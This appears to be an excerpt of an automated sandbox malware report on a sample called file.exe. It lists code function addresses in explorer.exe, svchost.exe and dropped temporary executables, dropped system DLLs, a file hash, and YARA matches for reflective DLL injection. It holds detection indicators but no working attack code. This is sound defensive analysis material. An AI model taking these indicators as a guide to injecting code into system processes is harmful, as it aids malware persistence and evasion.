          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A662B4_2_0E8A662B
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A66214_2_0E8A6621
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A663D4_2_0E8A663D
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A66334_2_0E8A6633
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A0E404_2_0E8A0E40
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C07244_2_0E8C0724
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C8C784_2_0E8C8C78
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A65804_2_0E8A6580
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8CC29C4_2_0E8CC29C
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C7AD44_2_0E8C7AD4
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8BE2E84_2_0E8BE2E8
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8CAA004_2_0E8CAA00
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8CB2544_2_0E8CB254
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C33D04_2_0E8C33D0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8B3BE04_2_0E8B3BE0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8A5B004_2_0E8A5B00
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C80F84_2_0E8C80F8
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C30204_2_0E8C3020
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8CC8324_2_0E8CC832
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8C09BC4_2_0E8C09BC
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8BE9284_2_0E8BE928
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9047E04_2_0E9047E0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F67004_2_0E8F6700
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F1A404_2_0E8F1A40
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91CE9C4_2_0E91CE9C
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9186D44_2_0E9186D4
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90EEE84_2_0E90EEE8
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91B6004_2_0E91B600
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91BE544_2_0E91BE54
          Source: C:\Windows\explorer.exeCode function: 4_2_0E913FD04_2_0E913FD0
          Source: C:\Windows\explorer.exeCode function: 4_2_0E918CF84_2_0E918CF8
          Source: C:\Windows\explorer.exeCode function: 4_2_0E91D4324_2_0E91D432
          Source: C:\Windows\explorer.exeCode function: 4_2_0E913C204_2_0E913C20
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9115BC4_2_0E9115BC
          Source: C:\Windows\explorer.exeCode function: 4_2_0E90F5284_2_0E90F528
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F720D4_2_0E8F720D
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F72174_2_0E8F7217
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F722B4_2_0E8F722B
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F72214_2_0E8F7221
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F723D4_2_0E8F723D
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F72334_2_0E8F7233
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9113244_2_0E911324
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9198784_2_0E919878
          Source: C:\Windows\explorer.exeCode function: 4_2_0E8F71804_2_0E8F7180
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A67004_2_0F4A6700
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C3FD04_2_0F4C3FD0
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4B47E04_2_0F4B47E0
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CBE544_2_0F4CBE54
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CB6004_2_0F4CB600
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C86D44_2_0F4C86D4
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4BEEE84_2_0F4BEEE8
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CCE9C4_2_0F4CCE9C
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4BF5284_2_0F4BF528
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C15BC4_2_0F4C15BC
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C3C204_2_0F4C3C20
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4CD4324_2_0F4CD432
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C8CF84_2_0F4C8CF8
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C13244_2_0F4C1324
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A1A404_2_0F4A1A40
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A720D4_2_0F4A720D
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A72174_2_0F4A7217
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A722B4_2_0F4A722B
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A72214_2_0F4A7221
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A723D4_2_0F4A723D
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A72334_2_0F4A7233
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4A71804_2_0F4A7180
          Source: C:\Windows\explorer.exeCode function: 4_2_0F4C98784_2_0F4C9878
          Source: C:\Windows\explorer.exeCode function: 4_2_10D898784_2_10D89878
          Source: C:\Windows\explorer.exeCode function: 4_2_10D671804_2_10D67180
          Source: C:\Windows\explorer.exeCode function: 4_2_10D61A404_2_10D61A40
          Source: C:\Windows\explorer.exeCode function: 4_2_10D672174_2_10D67217
          Source: C:\Windows\explorer.exeCode function: 4_2_10D6720D4_2_10D6720D
          Source: C:\Windows\explorer.exeCode function: 4_2_10D672334_2_10D67233
          Source: C:\Windows\explorer.exeCode function: 4_2_10D6723D4_2_10D6723D
          Source: C:\Windows\explorer.exeCode function: 4_2_10D672214_2_10D67221
          Source: C:\Windows\explorer.exeCode function: 4_2_10D6722B4_2_10D6722B
          Source: C:\Windows\explorer.exeCode function: 4_2_10D813244_2_10D81324
          Source: C:\Windows\explorer.exeCode function: 4_2_10D88CF84_2_10D88CF8
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8D4324_2_10D8D432
          Source: C:\Windows\explorer.exeCode function: 4_2_10D83C204_2_10D83C20
          Source: C:\Windows\explorer.exeCode function: 4_2_10D815BC4_2_10D815BC
          Source: C:\Windows\explorer.exeCode function: 4_2_10D7F5284_2_10D7F528
          Source: C:\Windows\explorer.exeCode function: 4_2_10D886D44_2_10D886D4
          Source: C:\Windows\explorer.exeCode function: 4_2_10D7EEE84_2_10D7EEE8
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8CE9C4_2_10D8CE9C
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8BE544_2_10D8BE54
          Source: C:\Windows\explorer.exeCode function: 4_2_10D8B6004_2_10D8B600
          Source: C:\Windows\explorer.exeCode function: 4_2_10D83FD04_2_10D83FD0
          Source: C:\Windows\explorer.exeCode function: 4_2_10D747E04_2_10D747E0
          Source: C:\Windows\explorer.exeCode function: 4_2_10D667004_2_10D66700
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: 5_2_00007FF7821C1F8C5_2_00007FF7821C1F8C
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: 5_2_00007FF7821C33605_2_00007FF7821C3360
          Source: C:\Windows\System32\audiodg.exeCode function: 7_2_00007FF6626D33607_2_00007FF6626D3360
          Source: C:\Windows\System32\audiodg.exeCode function: 7_2_00007FF6626D1F8C7_2_00007FF6626D1F8C
          Source: C:\Windows\System32\msiexec.exeCode function: 8_2_00007FF7F2D033608_2_00007FF7F2D03360
          Source: C:\Windows\System32\msiexec.exeCode function: 8_2_00007FF7F2D01F8C8_2_00007FF7F2D01F8C
          Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exeCode function: 9_2_0137DC749_2_0137DC74
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E100017_2_00007FF69F3E1000
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F405C7417_2_00007FF69F405C74
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3FFBD817_2_00007FF69F3FFBD8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3FD88017_2_00007FF69F3FD880
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F504017_2_00007FF69F3F5040
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F107417_2_00007FF69F3F1074
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F28C017_2_00007FF69F3F28C0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E979B17_2_00007FF69F3E979B
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E9FCD17_2_00007FF69F3E9FCD
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F0E7017_2_00007FF69F3F0E70
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F404F1017_2_00007FF69F404F10
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F402F2017_2_00007FF69F402F20
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F1F3017_2_00007FF69F3F1F30
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3FFBD817_2_00007FF69F3FFBD8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F40572817_2_00007FF69F405728
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3FCD6C17_2_00007FF69F3FCD6C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E95FB17_2_00007FF69F3E95FB
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F148417_2_00007FF69F3F1484
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F0C6417_2_00007FF69F3F0C64
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F2CC417_2_00007FF69F3F2CC4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F400B8417_2_00007FF69F400B84
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F4033BC17_2_00007FF69F4033BC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F73F417_2_00007FF69F3F73F4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F128017_2_00007FF69F3F1280
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F7AAC17_2_00007FF69F3F7AAC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F408A3817_2_00007FF69F408A38
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F0A6017_2_00007FF69F3F0A60
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3E8B2017_2_00007FF69F3E8B20
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F40518C17_2_00007FF69F40518C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3F91B017_2_00007FF69F3F91B0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 17_2_00007FF69F3FD20017_2_00007FF69F3FD200
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E100018_2_00007FF69F3E1000
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F404F1018_2_00007FF69F404F10
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F405C7418_2_00007FF69F405C74
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3FD88018_2_00007FF69F3FD880
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F504018_2_00007FF69F3F5040
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F107418_2_00007FF69F3F1074
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F28C018_2_00007FF69F3F28C0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E979B18_2_00007FF69F3E979B
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E9FCD18_2_00007FF69F3E9FCD
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F0E7018_2_00007FF69F3F0E70
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F402F2018_2_00007FF69F402F20
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F1F3018_2_00007FF69F3F1F30
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3FFBD818_2_00007FF69F3FFBD8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F40572818_2_00007FF69F405728
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3FCD6C18_2_00007FF69F3FCD6C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E95FB18_2_00007FF69F3E95FB
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F148418_2_00007FF69F3F1484
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F0C6418_2_00007FF69F3F0C64
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F2CC418_2_00007FF69F3F2CC4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F400B8418_2_00007FF69F400B84
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F4033BC18_2_00007FF69F4033BC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3FFBD818_2_00007FF69F3FFBD8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F73F418_2_00007FF69F3F73F4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F128018_2_00007FF69F3F1280
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F7AAC18_2_00007FF69F3F7AAC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F408A3818_2_00007FF69F408A38
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F0A6018_2_00007FF69F3F0A60
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3E8B2018_2_00007FF69F3E8B20
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F40518C18_2_00007FF69F40518C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3F91B018_2_00007FF69F3F91B0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FF69F3FD20018_2_00007FF69F3FD200
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2D03018_2_00007FFDFFC2D030
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4F00018_2_00007FFDFFC4F000
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC22FA018_2_00007FFDFFC22FA0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2FF6018_2_00007FFDFFC2FF60
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFCC5E6418_2_00007FFDFFCC5E64
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFCC8DF818_2_00007FFDFFCC8DF8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC50E1518_2_00007FFDFFC50E15
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC92C4818_2_00007FFDFFC92C48
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC87BFC18_2_00007FFDFFC87BFC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2FBE018_2_00007FFDFFC2FBE0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC25B5C18_2_00007FFDFFC25B5C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC3DAC018_2_00007FFDFFC3DAC0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC92A6818_2_00007FFDFFC92A68
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC328B018_2_00007FFDFFC328B0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2885418_2_00007FFDFFC28854
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC6274018_2_00007FFDFFC62740
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC226F818_2_00007FFDFFC226F8
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC316D018_2_00007FFDFFC316D0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC3F5A418_2_00007FFDFFC3F5A4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2F52018_2_00007FFDFFC2F520
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4C42918_2_00007FFDFFC4C429
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2C36018_2_00007FFDFFC2C360
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4238418_2_00007FFDFFC42384
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2233C18_2_00007FFDFFC2233C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2831018_2_00007FFDFFC28310
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC3030018_2_00007FFDFFC30300
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC462D018_2_00007FFDFFC462D0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC2327418_2_00007FFDFFC23274
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC4120018_2_00007FFDFFC41200
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFC3D12018_2_00007FFDFFC3D120
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFDFFCB00BC18_2_00007FFDFFCB00BC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE13316AE418_2_00007FFE13316AE4
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE13312DD018_2_00007FFE13312DD0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE133371CC18_2_00007FFE133371CC
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE1333D13018_2_00007FFE1333D130
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B3CF018_2_00007FFE148B3CF0
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B1A8018_2_00007FFE148B1A80
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B521C18_2_00007FFE148B521C
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B2D3018_2_00007FFE148B2D30
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B263018_2_00007FFE148B2630
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B314018_2_00007FFE148B3140
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B1A8018_2_00007FFE148B1A80
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: 18_2_00007FFE148B37B018_2_00007FFE148B37B0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe 9053B6BBAF941A840A7AF09753889873E51F9B15507990979537B6C982D618CB
          Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF6EEF21050 appears 105 times
          Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exeCode function: String function: 00007FF7821C1050 appears 105 times
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: String function: 00007FF69F3E25F0 appears 100 times
          Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exeCode function: String function: 00007FF69F3E2760 appears 36 times
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF63A831050 appears 105 times
          Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF7F2D01050 appears 105 times
          Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF6626D1050 appears 105 times
          Source: api-ms-win-core-string-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-utility-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-runtime-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-time-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-processthreads-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-processenvironment-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-environment-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-interlocked-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-conio-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-libraryloader-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-math-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l1-2-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-debug-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-rtlsupport-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-heap-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-file-l2-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-synch-l1-2-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-sysinfo-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-localization-l1-2-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-filesystem-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-namedpipe-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-stdio-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-util-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-timezone-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-datetime-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-convert-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-locale-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-synch-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-console-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-process-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-handle-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-heap-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-profile-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-crt-string-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-errorhandling-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-memory-l1-1-0.dll.17.drStatic PE information: No import functions for PE file found
          Source: api-ms-win-core-processthreads-l1-1-1.dll.17.drStatic PE information: No import functions for PE file found
          Source: file.exeBinary or memory string: OriginalFilename vs file.exe
          Source: file.exe, 00000000.00000003.1816351997.00000000009B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs file.exe
          Source: file.exe, 00000000.00000002.1817165395.00007FF63A838000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs file.exe
          Source: file.exe, 00000000.00000003.1816446381.00000000009C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs file.exe
          Source: file.exe, 00000000.00000002.1816809093.0000000000ED9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs file.exe
          Source: file.exe, 00000000.00000003.1816215024.00000000009B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs file.exe
          Source: file.exeBinary or memory string: OriginalFilenameServices.exe2 vs file.exe
          Source: 4.2.explorer.exe.a020000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.c350000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.0.explorer.exe.a020000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.cb95950.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 4.2.explorer.exe.e8f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
          Source: 2.2.svchost.exe.1301d095000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
